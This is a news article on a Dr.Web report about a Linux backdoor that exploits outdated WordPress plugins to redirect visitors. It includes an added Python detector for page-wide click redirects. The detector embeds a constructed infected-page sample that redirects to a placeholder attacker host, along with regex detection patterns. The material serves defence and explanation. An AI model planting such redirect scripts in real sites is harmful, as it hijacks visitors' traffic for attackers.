A previously unknown strain of Linux malware is targeting WordPress-based websites, according to research by cybersecurity firm Dr.Web.
The backdoor compromises sites by exploiting known vulnerabilities in numerous outdated WordPress plugins and themes. Those named by Dr.Web include WP Live Chat Support Plugin, WP Live Chat, Google Code Inserter and WP Quick Booking Manager.
The Trojan is remotely controlled by malicious actors, who communicate the address of the website it is to infect via its command and control (C&C) server. Threat actors are also able to remotely switch the malware to standby mode, shut it down and pause logging its actions.
Dr.Web believes the malicious tool could have been used by cyber-criminals for over three years to carry out such attacks and to monetize the resale of web traffic (traffic arbitrage).
In practice, a visitor to an infected page is sent to a website of the attackers' choosing as soon as they click anywhere on the page.
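The page-wide click redirect described above is something a site owner can look for directly in served HTML or theme files. The following is an added example written for this article, not Dr.Web's tooling or its published indicators: a heuristic that flags inline scripts which bind a click (or mouse/touch) handler to the whole document and then navigate to a host other than the site's own. The sample pages, and the `attacker.invalid` domain, are constructed for illustration; the regexes are a starting point, not a complete detector, and will miss obfuscated payloads.

```python
import os
import re
from urllib.parse import urlparse

# Constructed sample of an infected page: one script waits for any click on the
# document, then sends the visitor off-site. "attacker.invalid" is a placeholder,
# not a real indicator from the research.
INFECTED_HTML = """<html><head><title>Blog</title>
<script>
var done = false;
document.addEventListener("click", function (e) {
  if (!done) { done = true; window.location.href = "http://attacker.invalid/redirect?from=" + location.host; }
});
</script></head><body><p>Welcome</p></body></html>"""

# Constructed benign page: the click handler is scoped to one button and does not navigate.
BENIGN_HTML = """<html><head><script>
document.getElementById("submit-btn").addEventListener("click", function () { submitForm(); });
</script></head><body><button id="submit-btn">Send</button></body></html>"""

# Inline script bodies (case-insensitive, spanning newlines).
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)

# A handler attached to the whole page (document/window/body) rather than to one element.
GLOBAL_CLICK_RE = re.compile(
    r"(?:document|window|document\.body)\s*"
    r"(?:\.addEventListener\s*\(\s*['\"](?:click|mousedown|mouseup|touchstart)['\"]"
    r"|\.on(?:click|mousedown|mouseup|touchstart)\s*=)",
    re.I,
)

# Navigation to an absolute http(s) URL; the captured group is the literal URL prefix.
NAV_RE = re.compile(
    r"(?:location(?:\.href)?\s*=|location\.(?:replace|assign)\s*\(|window\.open\s*\()"
    r"\s*['\"](https?://[^'\"]+)",
    re.I,
)


def find_click_redirects(html, site_host):
    """Return a list of findings for scripts that hijack page-wide clicks and
    redirect to a host other than site_host. Each finding carries the target URL
    and a short snippet of the offending script for triage."""
    findings = []
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        if not GLOBAL_CLICK_RE.search(body):
            continue  # handler is element-scoped or absent: not the pattern we care about
        for nav in NAV_RE.finditer(body):
            url = nav.group(1)
            host = urlparse(url).netloc.lower()
            if host and host != site_host.lower():
                findings.append({"url": url, "snippet": body.strip()[:80]})
    return findings


def scan_tree(root, site_host, exts=(".php", ".js", ".html", ".htm")):
    """Walk a WordPress install (hypothetical path given by the caller) and apply the
    check to every file with a web-facing extension. Returns {path: findings}."""
    results = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = find_click_redirects(fh.read(), site_host)
            except OSError:
                continue
            if hits:
                results[path] = hits
    return results


if __name__ == "__main__":
    # Assumed site hostname; replace with the real one when running against a site.
    for label, page in (("infected", INFECTED_HTML), ("benign", BENIGN_HTML)):
        print(label, find_click_redirects(page, "example.com"))
```

Injected code in this campaign class usually lives in the database (post content, widgets, theme options) as well as on disk, so the same `find_click_redirects` check should also be run over the rendered page as a visitor sees it, for example by fetching the front page with a real browser user agent, since server-side conditions may hide the script from crawlers.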
The Trojan keeps statistics on its activity: the number of websites attacked, every vulnerability it has exploited, and separate counters for successful exploitation of the WordPress Ultimate FAQ plugin and the Facebook Messenger plugin from Zotabox. It also reports every unpatched vulnerability it detects back to the remote server.
It is also able to exploit additional vulnerabilities in a range of plugins, such as Brizy WordPress Plugin, FV Flowplayer Video Player and WordPress Coming Soon Page.
Dr.Web added that both versions of the Trojan contain "unimplemented" functionality for taking over the administrator accounts of targeted websites by brute force, that is, by trying known usernames and passwords drawn from dictionaries of common credentials.
The researchers warned that attackers may be planning to use this functionality for future versions of the malware. “If such an option is implemented in newer versions of the backdoor, cyber-criminals will even be able to successfully attack some of those websites that use current plugin versions with patched vulnerabilities,” they stated.
Dr.Web urged owners of WordPress-based websites to keep all components of their platforms updated, “including third-party add-ons and themes, and also use strong and unique logins and passwords for their accounts.”
With WordPress estimated to be used by around 43% of all websites, this CMS is being heavily targeted by cyber-criminals.
In September 2022, WordPress security-focused company Wordfence published an advisory warning that hackers attempted to exploit a zero-day flaw in a WordPress plugin called BackupBuddy five million times.
A few months earlier, in June 2022, WordPress was forced to update over a million sites to patch a critical vulnerability affecting the Ninja Forms plugin.